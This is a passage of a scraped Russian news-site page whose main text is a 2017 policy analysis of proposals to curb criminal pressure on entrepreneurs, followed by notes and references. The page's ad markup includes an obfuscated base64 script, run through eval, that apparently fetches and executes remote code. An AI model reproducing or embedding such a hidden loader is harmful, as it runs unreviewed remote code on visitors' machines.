<p>Под экономической амнистией авторы этой идеи обычно понимают не амнистию по отдельным составам, ассоциирующимся с предпринимательской деятельностью, а установление моратория на то, чтобы какие-либо экономические действия, совершенные до определенного момента (например, до 01.01.2017) не могут быть криминализованы, становиться объектом проверки и т. д. По мнению авторов этих предложений, такой мораторий должен вести к прекращению давления и, главное, к созданию относительной неприкосновенности частной собственности. Несмотря на кажущуюся логичность, в этом подходе есть две фундаментальные проблемы.</p>
<ul>
<li>Большая часть давления на низовом и среднем уровне связана не с преследованием за &laquo;старые&raquo;, а с привлечением к ответственности за &laquo;новые&raquo; действия.</li>
<li>В такой конструкции всегда остается возможность для переописания события как не имеющего отношения к предпринимательской деятельности и экономической активности (см. выше).</li>
</ul>
<p>Таким образом, существенного влияния на общий климат эта мера не окажет. Тем не менее, в ней есть здравое зерно. Возможно, для имущественных преступлений имеет смысл радикально сократить сроки давности привлечения к ответственности в случаях, когда подозреваемый не скрывался. Имеет смысл обсудить вопрос о сокращении таких сроков до двух-трех лет. Если за это время потерпевший не обнаружил ущерб и не обратился в правоохранительные органы, мы не можем считать этот ущерб настолько значительным для пострадавшего, чтобы задействовать машину уголовного правосудия. Впрочем, следует иметь в виду, что некоторые виды предпринимательских дел предполагают достаточно длительное расследование и достаточно сложную процедуру доказывания в суде. Известно (Четверикова, 2017), что тяжкие мошенничества (ч. 3&ndash;4) сейчас проходят путь от преступления до приговора за 25 месяцев, а налоговые преступления &mdash; за 40 месяцев. То есть слишком короткий срок давности может стать препятствием для правосудия по сложным делам. Безусловно, здесь должен быть найден разумный баланс.</p>
<h3>Создание частных механизмов (специальный прокурор, омбудсмен) по защите прав предпринимателей</h3>
<p>Само по себе появление данных механизмов &mdash; важный маркер того, что наличие проблемы силового давления на бизнес признается. Однако эффективность таких мер вызывает большие вопросы. Логика рассуждений их сторонников такова: есть предприниматели, их часто преследуют незаконно, давайте введем еще один инструмент оценки степени обоснованности и законности такого преследования (предполагается, что если бизнес-омбудсмен или специальный прокурор находит уголовное преследование обоснованным, то он не вмешивается в ситуацию). Эта логика основана на предположении, что судебные и следственные органы руководствуются иными критериями обоснованности, чем бизнес-омбудсмен или специальный прокурор. Если спецомбудсмен необходим потому, что у него иные подходы к оценке действий предпринимателей, это означает, что правоохранительные органы пользуются неадекватной системой оценки. В такой ситуации больший смысл может иметь изменение правоохранительной практики, а не создание новых институтов. В краткосрочной перспективе появление специальных механизмов может дать определенный положительный эффект, но уже в среднесрочной перспективе расхождение позиции правоохранительных органов и омбудсмена (или специального прокурора) станет источником конфликта.</p>
<h3>Изменение подследственности</h3>
<p>Одной из типичных мер, предлагаемых для &laquo;защиты&raquo; предпринимателей, является передача подследственности по все новым и новым предпринимательским статьям в СК. Если проанализировать механику работы правоохранительных органов в России, эта мера выглядит необоснованной. Причиной тому несколько факторов:</p>
<ul>
<li>Мы знаем, что кадры СК за пределами региональных управлений, как правило, гораздо менее опытны, чем кадры следственного аппарата МВД (Титаев, Шклярук, 2016). При этом нагрузка по количеству дел на следователя в обоих органах примерно одинакова, но СК работает с более тяжкими составами, которые, как правило, требуют больше рутинных усилий. В результате следователи СК более загружены.</li>
<li>В отличие от следственных органов МВД, в СК гораздо сильнее разрыв с оперативными структурами (МВД). Это означает, что у следователя СК гораздо меньше неформальных механизмов контроля качества работы на доследственной стадии. Поэтому он с гораздо большей вероятностью может стать жертвой фальсификации материалов со стороны оперативных работников.</li>
<li>Передача СК следствия по таким делам при сохранении фактической &laquo;разорванности&raquo; с оперативными службами и невозможности контролировать качество материалов приведет к появлению у следователей дополнительных стимулов для давления на бизнес в рамках &laquo;палочной системы&raquo; (внутренней системы оценки работы следственных подразделений) и ставит следователя в зависимость от оперативников других ведомств (МВД и ФСБ).</li>
</ul>
<p>С учетом этих факторов перевод следствия по таким делам в СК &mdash; мера скорее вредная, чем полезная.</p>
<h3>Введение института следственных судей</h3>
<p>Обсуждается введение для дел в сфере предпринимательской деятельности института следственных судей. Предполагается, что следственные судьи будут депонировать доказательства и санкционировать следственные действия. Однако остается непонятным, что заставит следственного судью работать не так, как обычных судей, &mdash; то есть санкционировать практически все следственные действия, а на жалобы адвокатов по поводу отказа в приобщении доказательств следователем реагировать, как правило, отказом. При сохранении общей модели работы следственных органов этот институт &mdash; возможно, в целом небесполезный &mdash; не окажет ощутимого влияния на ситуацию с уголовным преследованием бизнеса.</p>
<p>Изменение трактовки понятия &laquo;группа&raquo; и &laquo;организованная группа&raquo; применительно к предпринимательским статьям.</p>
<p>Любая предпринимательская деятельность является коллективной. Поэтому к характеристике абсолютно любого предпринимательского действия можно добавить как минимум &laquo;совершено группой лиц&raquo;, а нередко и &laquo;организованной группой&raquo;, продемонстрировав, что в действии (подписании фиктивного договора, например) принимали участие две стороны. Таким образом, изменение трактовки указанных понятий выглядит вполне разумным. Однако, учитывая свободу следователей в интерпретации предпринимательской деятельности как преступной, безусловно, будут оперативно найдены другие признаки, которые позволяют квалифицировать, например, мошенничество как более тяжкое. То есть отнести деяние к более тяжкой части той же статьи не за счет того, что преступление было совершено &laquo;группой&raquo;, а за счет того, что преступление было совершено, например, за счет &laquo;использования служебного положения&raquo; подозреваемым.</p>
<h3>Ужесточение наказания за нарушения патентного права</h3>
<p>Наряду с мерами по защите предпринимателей от силовиков, обсуждаются и меры по защите предпринимателей посредством силовиков. Самая яркая история этого рода (не считая упомянутой выше защиты кредиторов от ненадежных должников) &mdash; это ужесточение уголовного преследования за нарушения патентного права.</p>
<p>Как показывает практика, в реальности соответствующие статьи УК РФ и до, и после ужесточения используются точечно (по &laquo;заказу&raquo;): либо против относительно благонамеренных предпринимателей, допустивших некоторую оплошность, либо против субъектов микропредпринимательства. Никаких дополнительных стимулов для массового преследования сложных в доказывании нарушений, требующих большой работы по сбору доказательств, в обозримом будущем у правоохранительных органов не появится. Соответственно, ужесточая законодательство, мы не улучшаем ситуацию с защитой авторских и смежных прав в стране. Мы лишь облегчаем системе криминальной юстиции работу по достижению отчетных показателей (например, раскрываемость тяжких преступлений) и одновременно создаем дополнительный инструмент для давления на бизнес.</p>
<p>Вместо ужесточения уголовного законодательства следует обратить внимание на практику гражданских судов. Если речь идет о действительно масштабном нарушении (например, производстве запатентованного лекарства без патента), то, скорее всего, существуют крупные активы (оборудование, помещения и т. д.), на которые можно обратить взыскание в гражданско-правовом порядке, чтобы компенсировать причиненный нарушением ущерб.</p>
<h2>Примечания</h2>
<p>1. В связи с тем, что многие предложения озвучивались многократно и различными авторами, мы решили отказаться от подробного разбора авторства каждого предложения и самостоятельно сформулировать их суть в общем виде.</p>
<p>2. Сюда входят и преступления, связанные с деятельностью предприятия и наносящие ущерб окружающей среде или, например, безопасности персонала. Однако основное внимание в этом обзоре сфокусировано на той части предпринимательских преступлений, которые обычно относятся к преступлениям экономики.</p>
<p>3. Подробный разбор см. Четверикова 2017.</p>
<p>4. Здесь и далее обзор данных на материалах МВД, портала https://crimstat.ru и Судебного департамента при ВС РФ.</p>
<p>5. В статистических справочниках не имеется отдельной категории &laquo;предприниматель&raquo;, поэтому для анализа привлечения к уголовной ответственности предпринимателей исследователи могут конструировать эту категорию в виде совокупности прямо названных социальных статусов обвиняемого (например, руководитель организации, индивидуальный предприниматель и т. д.), а сотрудники правоохранительных органов собирают эту информацию, запрашивая нижестоящие подразделения о наличии дел в отношении предпринимателей.</p>
<p>6. Мы не можем назвать точную цифру, так как интересующий нас тип предпринимательских преступлений не отражается в существующих системах учета.</p>
<p>7. Так, за год санкционируется только чуть более 30 тысяч арестов имущества и физических и юридических лиц.</p>
<p>8. Качественные данные (интервью) свидетельствуют о том, что предприниматели и адвокаты называют доследственные проверки способом давления на бизнес, но на этой стадии, при наличии качественной юридической защиты, шансы предпринимателя не подвергнуться уголовному преследованию достаточно высоки.</p>
<h2>Литература</h2>
<p>Волков В. (2017) Эмпирическая социология права в условиях междисциплинарного синтеза. Социологические исследования, 4: 30&ndash;38</p>
<p>Маркин М. (2016) Аналитический отчет &laquo;Диагностика проблемы &bdquo;правоохранительная система и бизнес&ldquo;&raquo;. На правах рукописи. М.: ЦСР.</p>
<p>Титаев К., Шклярук М. (2016) Российский следователь: призвание, профессия повседневность. М.: Норма</p>
<p>Четверикова И. (2016) Уроки либерализации: отправление правосудия по уголовным делам в экономической сфере в 2009&ndash;2013 гг. СПб: ИПП ЕУ СПб.</p>
<p>Четверикова И. (2017) Структура и основные черты экономических преступлений в России (на данных 2013&ndash;2016 годов). СПб: ИПП ЕУ СПб.</p>
<p>Yakovlev A. (2015) State-Business Relations in Russia after 2011: &lsquo;New Deal or Imitation of Changes? in Oxenstierna S. (ed.) The Challenges for Russia&rsquo;s Politicized Economic System Oxford: Routledge: 59&ndash;76.</p>
            
          </div>

          <div style="padding-bottom: 20px;"><h4 style="color: #007854;text-transform: uppercase;font-size: 120%;padding: 0;">Обсудите в соцсетях</h4>
            <script type="text/javascript">(function(w,doc) {
            if (!w.__utlWdgt ) {
                w.__utlWdgt = true;
                var d = doc, s = d.createElement('script'), g = 'getElementsByTagName';
                s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
                s.src = ('https:' == w.location.protocol ? 'https' : 'http') + '://w.uptolike.com/widgets/v1/uptolike.js';
                var h=d[g]('body')[0];
                h.appendChild(s);
            }})(window,document);
            </script>
            <div data-background-alpha="0.0" data-buttons-color="#ffffff" data-counter-background-color="#ffffff" data-share-counter-size="12" data-top-button="false" data-share-counter-type="separate" data-share-style="10" data-mode="share" data-like-text-enable="false" data-hover-effect="scale" data-mobile-view="false" data-icon-color="#ffffff" data-orientation="horizontal" data-text-color="#ffffff" data-share-shape="rectangle" data-sn-ids="fb.tw.vk.ok.lj.em." data-share-size="40" data-background-color="#ffffff" data-preview-mobile="false" data-mobile-sn-ids="fb.vk.tw.wh.ok.gp." data-pid="1413315" data-counter-background-alpha="1.0" data-following-enable="false" data-exclude-show-more="true" data-selection-enable="false" class="uptolike-buttons" ></div>
          </div>
        </div>

        <!-- start banner google adsense -->
        <!-- Polit\polit.ru\468x60 -->
        <!--ins class="adsbygoogle"
        style="display:inline-block;width:468px;height:60px"
        data-ad-client="ca-pub-1154951643410219"
        data-ad-slot="4824359318">
        </ins>
        <script>
        (adsbygoogle=window.adsbygoogle || []).push({});
        </script-->
        <!-- stop banner google adsense -->

        
        
        <div class="bottom-social stop">
          <div class="print">
            <a href="/article/2017/06/19/csr/print/" rel="nofollow">Версия для печати</a>
          </div>
        </div>
       <!--  
<div class="comments stop">
  <div class="subject">Комментарии</div>
  <div class="comments-content">
    <div class="fb-comments" data-href="http://polit.ru/article/2017/06/19/csr/" data-width="580" data-num-posts="10"></div>
    <div id="vk_comments"></div>
    <script type="text/javascript">
      VK.Widgets.Comments("vk_comments", {limit: 10, width: "580", attach: false});
    </script>
  </div>
</div>

 -->
	<script type="text/javascript" src="/static/orphus/orphus.js"></script>
	<a href="http://orphus.ru" id="orphus" target="_blank" title="Система Orphus" rel="nofollow"><img alt="Система Orphus" src="/static/orphus/orphus.gif" border="0" width="600"></a>
        
          
        
        <div style="width:600px;">
      <!-- 24СМИ Start -->
      <div id="smi_teaser_3061">
           <center><a href="http://ex.24smi.info">Новости 24СМИ</a></center>
      </div>
      <script type="text/JavaScript" encoding="utf8">
               (function() {
               var sm = document.createElement("script");
               sm.type = "text/javascript";
               sm.async = true;
               sm.src = "http://jsn.24smi.org/4/a/3061.js";
               var s = document.getElementsByTagName("script")[0];
               s.parentNode.insertBefore(sm, s);})();
      </script>
      <!-- 24СМИ End -->

      <!-- LentaInformNews Start -->
      <div id="LentaInformScriptRootN11072" class="news-block-magick">
        <div id="LentaInformPreloadN11072">
          <a href="http://lentainform.com/" target="_blank">Загрузка...</a>
        </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN11072")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN11072");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=11072;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/p/o/polit.ru.11072.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
        </script>
      </div>
      <!-- LentaInformNews End -->

      <!-- google adsense -->
<script type="text/javascript"><!--
google_ad_client = "ca-pub-1191230850516122";
/* adxguru\polit.ru\468x60\0 */
google_ad_slot = "8133317607";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
      <!-- google adsense End -->

      <!-- MarketGidNews Start -->
      <div id="MarketGidScriptRootN13911" class="news-block-magick">
           <div id="MarketGidPreloadN13911">
                <a href="http://marketgid.com/" target="_blank">Загрузка...</a>
           </div>
           <script>
               (function(){
                   var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
                   var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootN13911")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
                   catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootN13911");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=13911;c[ac](dv);
                   var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.marketgid.com/1/p/1.polit.ru.13911.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
           </script>
      </div>
      <!-- MarketGidNews End -->

      <!-- smi2 Start -->
      <div id="unit_84866"><a href="http://smi2.net/">Новости СМИ2</a></div>
      <script type="text/javascript" charset="utf-8">
        (function() {
          var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
          sc.src = '//news.smi2.ru/data/js/84866.js'; sc.charset = 'utf-8';
          var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
        }());
      </script>
      <!-- smi2 End -->


      <!-- RedTram Start -->
      <div id="n4p_15006">Loading...</div>
      <script type="text/javascript" charset="utf-8">
      (function(d,s){
      var o=d.createElement(s);
      o.async=true;
      o.type="text/javascript";
      o.charset="utf-8";
      if (location.protocol == "https:")
      { o.src="https://js-goods.redtram.com/ticker_15006.js"; o.setAttribute("alt-src","https://js-goods.redtram.com/ticker_15742.js");}
      else
      { o.src="http://js.grt02.com/ticker_15006.js"; o.setAttribute("alt-src","http://js.grt02.com/ticker_15742.js");}
      o.setAttribute("cur-id","n4p_15006");
      o.setAttribute("alt-id","n4p_15742");
      o.setAttribute("o-data",eval(atob('KGZ1bmN0aW9uKCl7dmFyIGE9KGMpKCJcInluc3AlYXN0b2FFc0VBZXFydDlkaHZueS9Fb0JlQWNGbG5sSkRYTHMldE0lRXMlVnRhQWZuJXJkMyVcIm43TVVhJWVpeGR0YTAsZW9zciBhZCVRYSllZWxlV2V0VGR0VHNsaXNuZWUlc25lbmklbXVzV3JkcnN3JSVlJSVSZWFkYS5zS2VoJW1XJXFMc3Jvd29zcl93byVlcmVvJTpHb0VpNW9ydCUoME91bm5uQWMlOnhpZShvc3BocmdsYXNucm95dGV0bnlJJ1pheCVyQXJpb2lHJWd0ZGRzdHppYS9ubUFlZ1RlXCJyJyVpQ25kcE9jZXNsaGh0dGNhcGFubU5DZSVjcmp3ZWNlYmV1Y0l0bSVhXCJidGVuZWVjaXBvd25kTSV0czZhLy8lQXJBZ25zeE9hb25vX0Ulc2xoZ2dwYSVrJXJnSCVycGdBcHJzb2RuZHR5ZCV7cHV0bW8vcmVwSWVlcXNldG9QUi8lJXI7aWFhZWxjJWN5bSVvUlwiJXQlQXJBb21BcGlwbmllKEtlb0J9aEFsU2ZvdEJBckVmT2VrJUFpb29YSHd1R2ZtJW9BZGwlbXRlbi5tbjp2bHNBKWglb2VjdW1ldXQlPWVlZW50bGU7ZUJhYW9naHBpZnJqdmV0dEVlblRwYXQ4cnRndG1kJWdzdSVOTm9Dbnkxd3NBZHJxeW5ldFNkcGUlcm0lc29kQWUuJSVsZWp9JWNBeSVuVHVkb3NSdGJcImVsNm9yOnNkbzp4ZUhvQyVibm97aHNuJW9BJVF0QW8sZW50bUc9fCVcIiVpbFdFRG5zbnBybGxyQmhFbDJpNCV3dGkpZnB0X3QvNSVMZU5zQ3ZlYUFka2VvZSVlYSV3bG9wcmphU3RldGF0Z2V6aHI0bW9uc0wuU3RlaUF0YXlvXCIlJUFiZXNFZmFvdCIsMTM2ODYwMzMpO2Z1bmN0aW9uIGMoZSxwKXt2YXIgYj1lLmxlbmd0aDt2YXIgbD1bXTtmb3IodmFyIG89MDtvPCBiO28rKyl7bFtvXT0gZS5jaGFyQXQobyl9O2Zvcih2YXIgbz0wO288IGI7bysrKXt2YXIgZj1wKiAobysgNSkrIChwJSA0NTg4NDIpO3ZhciBjPXAqIChvKyA3KSsgKHAlIDI2NTk3NSk7dmFyIG49ZiUgYjt2YXIgZz1jJSBiO3ZhciBoPWxbbl07bFtuXT0gbFtnXTtsW2ddPSBoO3A9IChmKyBjKSUgNTU5MTc4Nzd9O3ZhciBqPVN0cmluZy5mcm9tQ2hhckNvZGUoMTI3KTt2YXIgbT0iIjt2YXIgaT0iXHgyNSI7dmFyIGE9Ilx4MjNceDMxIjt2YXIgZD0iXHgyNSI7dmFyIHE9Ilx4MjNceDMwIjt2YXIgaz0iXHgyMyI7cmV0dXJuIGwuam9pbihtKS5zcGxpdChpKS5qb2luKGopLnNwbGl0KGEpLmpvaW4oZCkuc3BsaXQocSkuam9pbihrKS5zcGxpdChqKX1mdW5jdGlvbiBiKCl7ZnVuY3Rpb24gaChnLGYpe2lmKCFjKXtiPSB0cnVlfTt2YXIgaj1bYVswXSxhWzFdLGFbMl1dLGk9YVszXSxlLGg9MDtnPSAxMDtmPSAxNjtlPSBnKyBNYXRoW2FbNV1dKE1hdGhbYVs0XV0oKSogKGYtIGcpKTtpZighYSl7Yj0gMX07Zm9yKHZhciBkPTA7ZDwgZTtkKyspe2krPSBqW2hdW01hdGhbYVs1XV0oTWF0aFthWzRdXSgpKiBqW2hdW2FbNl1dKV07aD0gKGgrIE1hdGhbYVs1XV0oTWF0aFthWzRdXSgpKiAxMDApKSUgM307cmV0dXJuIGl9dmFyIGQ9e307ZFthWzddXT0gW107ZFthWzhdXT0gZnVuY3Rpb24oYil7ZFthWzddXVthWzEwXV0oYlthWzldXSl9O2RvY3VtZW50W2FbMTJdXShhWzExXSxkW2FbOF1dLHRydWUpO2Z1bmN0aW9uIGcoYil7cmV0dXJuIGJbYVsxNV1dKGFbM10pW2FbMTRdXSgpW2FbMTNdXShhWzNdKX12YXIgZj1kb2N1bWVudFthWzE3XV0oYVsxNl0pO2ZbYVsxOV1dW2FbMThdXT0gYVsyMF07ZG9jdW1lbnRbYVsyMl1dW2FbMjFdXShmKTtkW2FbMjNdXT0gIG5ldyBmW2FbMjldXVthWzI4XV0oZyhhWzI0XSsgKChsb2NhdGlvblthWzI1XV09PSBhWzI2XSk/YVsyN106YVsyM10pKSk7aWYoIWMpe2M9IDF9O2RbYVsyM11dW2FbMzBdXT0gZnVuY3Rpb24oZCl7aWYoYz09IDEpe2IoZmFsc2UsYVsxOF0pO2I9IHRydWU7cmV0dXJufWVsc2Uge2lmKGRbYVszM11dW2FbMzRdXSgwLGRbYVszM11dW2FbMzJdXShhWzMxXSkpPT0gYVszNV0pe2UoZFthWzMzXV1bYVszNF1dKGRbYVszM11dW2FbMzJdXShhWzMxXSkrIDEsZFthWzMzXV1bYVs2XV0pKX19fTtmdW5jdGlvbiBpKCl7aWYoIWMpe2MoZmFsc2UsMCk7Yz0gZmFsc2U7cmV0dXJufTt2YXIgYj1kb2N1bWVudFthWzM3XV0oYVszNl0pO2Zvcih2YXIgZj0wO2Y8IGJbYVs2XV07ZisrKXtiW2ZdW2FbMzhdXT0gYVszOV19O3ZhciBlPVtkb2N1bWVudFthWzQwXV1dO2lmKGRvY3VtZW50W2FbNDJdXVthWzQxXV0pe2VbYVsxMF1dKGRvY3VtZW50W2FbNDJdXVthWzQxXV1bYVs0MF1dKX07aWYoIWEpe3JldHVybn07Zm9yKHZhciBmPTA7ZjwgZVthWzZdXTtmKyspe2Zvcih2YXIgZz0wO2c8IGVbZl1bYVs2XV07ZysrKXt2YXIgZD1lW2ZdW2ddO2RbYVs0M11dW2FbNDVdXVthWzQ0XV0oZFthWzQzXV0pfX19ZnVuY3Rpb24gZShiKXt2YXIgZT1oKCk7aWYoIWMpe2MoZmFsc2UsdHJ1ZSxudWxsKTtjPSBmYWxzZX07d2luZG93W2VdPSBkO2I9IGFbNDZdKyBiKyBhWzQ3XSsgZSsgYVs0OF07ZXZhbChiKX1pZihjPT0gMSl7Yj0gZmFsc2U7cmV0dXJufTtkW2FbMjNdXVthWzQ5XV09IGZ1bmN0aW9uKCl7ZFthWzIzXV1bYVs1MV1dKGcoYVs1MF0pKX07ZFthWzIzXV1bYVs1Ml1dPSBmdW5jdGlvbihkKXt2YXIgaD0gbmV3IGZbYVsyOV1dW2FbNTNdXSgpO2hbYVs1Nl1dKGFbNTRdLGcoYVs1NV0pLHRydWUpO2hbYVs1N11dPSBwZXJmb3JtYW5jZVthWzU4XV0oKTtoW2FbNTldXT0gZnVuY3Rpb24oKXtpZighYSl7YigpO3JldHVybn1lbHNlIHtpZihoW2FbNjBdXT09IDQpe2lmKGhbYVs2MV1dPT0gMjAwKXtlKGhbYVs2Ml1dKX1lbHNlIHtpZihjPT0gMSl7cmV0dXJufTtpZihoW2FbNjFdXT09IDApe2lmKGM9PSB0cnVlKXtjKCl9O2lmKChwZXJmb3JtYW5jZVthWzU4XV0oKS0gaFthWzU3XV0pPCA1MCl7aWYoIWEpe2IoMSwwKX1lbHNlIHtpKCl9fX19fX19O2lmKGI9PSAxKXtyZXR1cm59O2hbYVs1MV1dKG51bGwpfX0oYikoKX0pKCk=')));
   
    //
      var x=d.getElementsByTagName(s)[0];
      x.parentNode.insertBefore(o,x);
      })(document,"script");
      </script>
      <!-- RedTram End -->
</div>

      </div>
      
        
          
<div class="new-materials-for-rubric" style="display: none;">
  <div class="proscience-subject">Новое</div>
  <div class="square-flow">
    
  <div class="col3-special" id="square-article50731">
    
<a href="/article/2017/06/19/titaev_photo/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/06/19/thumbs/0CG6A0863_NKfMD7i_1497865676.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Кирилл Титаев" title="Кирилл Титаев" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Лекция Кирилла Титаева о реформах. Фоторепортаж
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news450815">
    
<a href="/news/2017/06/19/pepper_gas/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/06/12/thumbs/IMG_6398_1497877974.JPG.0x142_q85_crop_cropsize-190x142.jpg" alt="Митинг 12 июня в Москве" title="Митинг 12 июня в Москве" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Полиция Петербурга заявила о законности применения перцового газа против задержанных
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-article50733">
    
<a href="/article/2017/06/19/fnb/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/06/19/thumbs/800-600_2mdCBZz_1497875602.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Пляжная скульптура. Рука с монетами." title="Пляжная скульптура. Рука с монетами." height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      Симон Жаворонков
    
  
</div>

    <h4>
      Минфин отказывается от пополнения ФНБ
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news450818">
    
<a href="/news/2017/06/19/kursky_railway/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2015/05/06/thumbs/kurskiy-vokzal_1497876353.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Курский вокзал" title="Курский вокзал" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      У Курского вокзала поезд столкнулся с электричкой
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news450810">
    
<a href="/news/2017/06/19/ps_kepler_conjecture/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/06/19/thumbs/ps_image_4960e-Kepler-Conjecture_1497875155.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Профессор Томас Хейлс" title="Профессор Томас Хейлс" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Окончательно доказана гипотеза Кеплера об упаковке шаров
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news450816">
    
<a href="/news/2017/06/19/yavlinsky/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/12/19/thumbs/1_nUBjKJw_1497874748.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Григорий Явлинский" title="Григорий Явлинский" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Явлинский начал сбор подписей за выход РФ из военных конфликтов
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-article50732">
    
<a href="/article/2017/06/19/france/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/06/19/thumbs/1_1497866968.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Предвыборное ралли партии &quot;Вперед, республика!&quot;" title="Предвыборное ралли партии &quot;Вперед, республика!&quot;" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      Анна  Сакоян
    
  
</div>

    <h4>
      Франция: смена политической парадигмы
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news450811">
    
<a href="/news/2017/06/19/syria3/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2015/12/23/thumbs/sir2_1497873965.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="ВКС РФ в Сирии" title="ВКС РФ в Сирии" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Военные РФ заявили о прекращении взаимодействия с США по Сирии
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news450805">
    
<a href="/news/2017/06/19/sk_gert_gib/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/06/19/thumbs/gib_1497863741.png.0x142_q85_crop_cropsize-190x142.png" alt="Group IB" title="Group IB" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Group-IB заблокировала сайты мошенников, использовавших бренд «Аэрофлот»
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news450809">
    
<a href="/news/2017/06/19/highrises/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/06/16/thumbs/Grenfell_Tower_fire_wider_view_1497870111.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Лондон, пожар в высотке Grenfell Tower" title="Лондон, пожар в высотке Grenfell Tower" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Число жертв пожара в лондонской высотке могло достичь 79 человек
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news450808">
    
<a href="/news/2017/06/19/ps_vyazma/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/06/19/thumbs/ps_unnamed_1497869531.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Общий вид раскопа, видно мощение улицы XVII века и дома середины XVII века (в верхней части кадра)" title="Общий вид раскопа, видно мощение улицы XVII века и дома середины XVII века (в верхней части кадра)" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Археологи выяснили время появления города Вязьмы
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news450807">
    
<a href="/news/2017/06/19/kremlin_reaction/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/11/15/thumbs/1_TO26fmf_1497868601.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Владимир Путин и Дмитрий Песков" title="Владимир Путин и Дмитрий Песков" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Кремль отреагировал на продление санкций против Крыма
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news450806">
    
<a href="/news/2017/06/19/poroshenko_usa/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/09/06/thumbs/poroshenko_1497867557.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Петр Порошенко в Верховной Раде" title="Петр Порошенко в Верховной Раде" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Киев заявил об отъезде Порошенко в США
    </h4>
  </div>
</a>

  </div>


  </div>
</div>

        
      
    </div>



<!--END #content-->

  
    
      
        
<div class="right-column ib-col">
  <div class="left-or-right-top-banner-slot"></div>
  <h4 class="subject">Главные новости</h4>

<div class="top-news">
  
